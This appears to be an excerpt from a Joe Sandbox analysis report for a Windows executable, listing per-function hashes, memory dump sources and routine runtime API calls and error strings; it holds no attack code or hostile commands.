• Instruction ID: 970cd94f5bdae795aeaec3753c2e220e7f3c3f68ed4cc1925391a9e03ad2c6f7
• Opcode Fuzzy Hash: fe1e638170c73c8358d48f427b911bbbc02c139701cf0732f1db1911624686f5
• Instruction Fuzzy Hash: F3219F22E0E34682FB6A6732565127961915F447F0F046734E83ECB7DADEBCBE106720
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: a1e54ec175de851058e37af8a1d5e0fa141ee03ccab10034a8763fdf20805efa
• Instruction ID: 19edd722d673360ad18980d18c12f5246c81eac829e16c7ec1c56d594badd3e4
• Opcode Fuzzy Hash: a1e54ec175de851058e37af8a1d5e0fa141ee03ccab10034a8763fdf20805efa
• Instruction Fuzzy Hash: BA118B31E18A4286F7509B52E854329A2A4FB98BE4F040234EA2EC77A9CF3CD8649740
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB747
• FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB77D
• FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7AA
• FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7BB
• FlsSetValue.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7CC
• SetLastError.KERNEL32(?,?,?,00007FF6313E52DD,?,?,?,?,00007FF6313EF06F,?,?,00000000,00007FF6313EB856,?,?,?), ref: 00007FF6313EB7E7
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 63a3aeea47663878289526d39a4006a7ce9b45f44c173e715a196441d791a15c
• Instruction ID: e517c52fc7540bdc30a53a117d4a91798c80b669c74691be822dc5cb2a6a012b
• Opcode Fuzzy Hash: 63a3aeea47663878289526d39a4006a7ce9b45f44c173e715a196441d791a15c
• Instruction Fuzzy Hash: 24119026E4E34282FB559331965117961966F447F0F186734D83EC6BCADE7CAE11A320
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: fd8339915c2382beb504f92f2371690f4226147291c5d2cc73aac64d73f8b296
• Instruction ID: 1be04cb081fe2011e029a508317954f8ef33847185a13e892b8646606eeaec4f
• Opcode Fuzzy Hash: fd8339915c2382beb504f92f2371690f4226147291c5d2cc73aac64d73f8b296
• Instruction Fuzzy Hash: 46518C32F19642CAFB15CF25E844A397BA5FF44B88F518134EA5E87788DF78E941A700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 51414fb672fe40a92ea9c14e6c83c1e355ce73d43b77f4f87378d7d39517d9a9
• Instruction ID: 105537f59b74df368f818ff51abb4590a06f8f5b129ee9ab8ada94133d5cad97
• Opcode Fuzzy Hash: 51414fb672fe40a92ea9c14e6c83c1e355ce73d43b77f4f87378d7d39517d9a9
• Instruction Fuzzy Hash: C1313972E09A8289FB20DB61E8552F973A0FF88784F445135EA4E8BB5ADF3CD645D700
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
  • Part of subcall function 00007FF6313D8510: GetLastError.KERNEL32(00000000,00007FF6313D29FE,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D8537
  • Part of subcall function 00007FF6313D8510: FormatMessageW.KERNEL32 ref: 00007FF6313D8566
  • Part of subcall function 00007FF6313D8A90: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
• MessageBoxW.USER32 ref: 00007FF6313D2A90
• MessageBoxA.USER32 ref: 00007FF6313D2AAC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Message$ErrorLast$ByteCharFormatMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 2806210788-2410924014
• Opcode ID: 99117b17f4c39fadc0b19c6ef7758edd010b836457af41afdf5b4f661e116906
• Instruction ID: b1032efbcce201318b932b37f81dfb7bc71144b3f33cf26170d88869b1e528b4
• Opcode Fuzzy Hash: 99117b17f4c39fadc0b19c6ef7758edd010b836457af41afdf5b4f661e116906
• Instruction Fuzzy Hash: 373125B2A2868291F730DB11E4516EA63A4FF847C4F805136E68D87B59DF3CD745DB40
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: a7e00c60131c6f6b1755f0d1ae2fc89d44cde4883235dc6928da60d710fc640c
                                                                                                                                                                      • Instruction ID: cfeb61998b328b7878e43ff9b3597fdfd81287f496c6e1f787e582604d1bbb59
                                                                                                                                                                      • Opcode Fuzzy Hash: a7e00c60131c6f6b1755f0d1ae2fc89d44cde4883235dc6928da60d710fc640c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF062B6F1970281FB108B24E844779A3A0EF48761F541235D9AE863E8CF3CD549E310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                      • Instruction ID: 3d49aaac1500e06b64d9aa56fc90c78b13a0e67a9a21d1e0fb4b12096ee53752
                                                                                                                                                                      • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D11A026E1CA1B51FB681168E94237921D0AF58370FD81734FA7EC63D6CE7CAC806301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB81F
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB83E
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB866
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB877
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6313EAA17,?,?,00000000,00007FF6313EACB2,?,?,?,?,?,00007FF6313E307C), ref: 00007FF6313EB888
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 3b1417492c1664ef56cebc0553d05ba5b8c3d2d36602f5e547c1f8129dc7f272
                                                                                                                                                                      • Instruction ID: b98bd3a74b275a512eb4e29bd4d940ce89a7ca7d820ae59911034008eaa19e9f
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b1417492c1664ef56cebc0553d05ba5b8c3d2d36602f5e547c1f8129dc7f272
                                                                                                                                                                      • Instruction Fuzzy Hash: E9117F22E0A38286FB599322555117A65956F447E0F086334E83DD67DADE7CFE11A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 39ca93b15b7086f2063f4337c840f0784d3557f633beefc8c86d4c1bd21ffce6
                                                                                                                                                                      • Instruction ID: 0288b5dac3babd7e20d55525a256908ad917de8a090253344e999a272471739d
                                                                                                                                                                      • Opcode Fuzzy Hash: 39ca93b15b7086f2063f4337c840f0784d3557f633beefc8c86d4c1bd21ffce6
                                                                                                                                                                      • Instruction Fuzzy Hash: 21112A22E0A30786FB5AA63244512BA21865F453B0F183734D83ECA7DADDBDBE116631
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                      • Opcode ID: 949f789820f60b9edc3b3d9021f3b8c6b6af15b8acf6f547bb3703cfae1424d0
                                                                                                                                                                      • Instruction ID: 5162d3b8aee7e9aa96907d02664f025987fc568753532585db8aa611f7777277
                                                                                                                                                                      • Opcode Fuzzy Hash: 949f789820f60b9edc3b3d9021f3b8c6b6af15b8acf6f547bb3703cfae1424d0
                                                                                                                                                                      • Instruction Fuzzy Hash: F491DCB3E48B4681FB618E25D4103BD37A1AB40B68F446136DA9EC73D5DE3CEE05A720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                      • Opcode ID: 0b870b3a3d649be6e4f6c0b612b8e25b541f8dcea366d64dcbc5d49be93c66d1
                                                                                                                                                                      • Instruction ID: 6b0916b6aa5c1a38a5e61c63881268ede55f59a7f04d2db2fc531e399689f6b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b870b3a3d649be6e4f6c0b612b8e25b541f8dcea366d64dcbc5d49be93c66d1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D81AE72E0C20285FB648F2DC2542B82BE2EB51B58FA58035DA6DD7795DF3DE901BB01
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 59ac2c9e4a5220c2fa7bc6dcfd9cbcaf6d037ac2a111382551f8a72c0d17a11c
• Instruction ID: 2a41f9f020d58f37060e4f1e7d79d6515e363ed09f788a0eead354ac23ece127
• Opcode Fuzzy Hash: 59ac2c9e4a5220c2fa7bc6dcfd9cbcaf6d037ac2a111382551f8a72c0d17a11c
• Instruction Fuzzy Hash: 28615873E08B458AF7208F65E4803AD7BA4FB49B98F144225EE4D57B98DF38E156D700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 1180bfda959e97f02d570b5dde1e1b48c1dd59e29b574f701b62c64f34128176
• Instruction ID: 05fc6b2a0cdc1dd460713112e6a71bb6b481ea0d1ce8b718c2adb78bc67ac22f
• Opcode Fuzzy Hash: 1180bfda959e97f02d570b5dde1e1b48c1dd59e29b574f701b62c64f34128176
• Instruction Fuzzy Hash: B2519B32D0828286FB648F2595942787BA8FF44B98F144135DA9DD7BD5CF3CE462E700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 1878133881-2410924014
• Opcode ID: 38c4b4e2a01e1bb9762b054cdf89db1cb30aa17529e4998d71cfbd5aabc681da
• Instruction ID: d9cc0084dd855f677b81ebab6651fbf7a8a76150cc0075da587f2d3a88fc0f50
• Opcode Fuzzy Hash: 38c4b4e2a01e1bb9762b054cdf89db1cb30aa17529e4998d71cfbd5aabc681da
• Instruction Fuzzy Hash: A33123B2A2868291FB30EB10E4516EA63A4FF847C4F805136E68D97B99DF3CD705DB40
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D3EA1
  • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
  • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ErrorFileLastMessageModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
• API String ID: 2581892565-1977442011
• Opcode ID: 884470a16d803e703ac994cbfd20ed5309a2f1ef6ebe04e4886aa8d96d26a44e
• Instruction ID: 8306b74de74d5bc713d0f675630365355400bfa992cf039f3a5ddf0bc3f5d9f9
• Opcode Fuzzy Hash: 884470a16d803e703ac994cbfd20ed5309a2f1ef6ebe04e4886aa8d96d26a44e
• Instruction Fuzzy Hash: A8018BA2F1D64380FB60E720E8157B95295AF5D7C4F800436E84EC7396EE3DE64AE700
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 363851c63275ea675678f574e082c43441c16a767f927bd16495698a93953cb3
• Instruction ID: 576dc776bcc55c9dd7670ca97864f30958ba2ba00290e1cbf92261b5e92f54c2
• Opcode Fuzzy Hash: 363851c63275ea675678f574e082c43441c16a767f927bd16495698a93953cb3
• Instruction Fuzzy Hash: 48D1CE73F18B8189FB11CF69D4402AC3BA1FB84B98B045236CE5D97B9ADE38D916D350
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 2554d0f3aaa8c7c8845c2ac82e2dc95f9a74a923a0d9a28b3c9ce595bb4fe81d
• Instruction ID: 397ee911750b5e6b624a3c58c21f32038454de464488f75cacac492d6f1f7bb2
• Opcode Fuzzy Hash: 2554d0f3aaa8c7c8845c2ac82e2dc95f9a74a923a0d9a28b3c9ce595bb4fe81d
• Instruction Fuzzy Hash: 55515C6BE087418AFB10DFB1D4403BD27A1AF48B58F149535DE099B789DF38DA519720
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
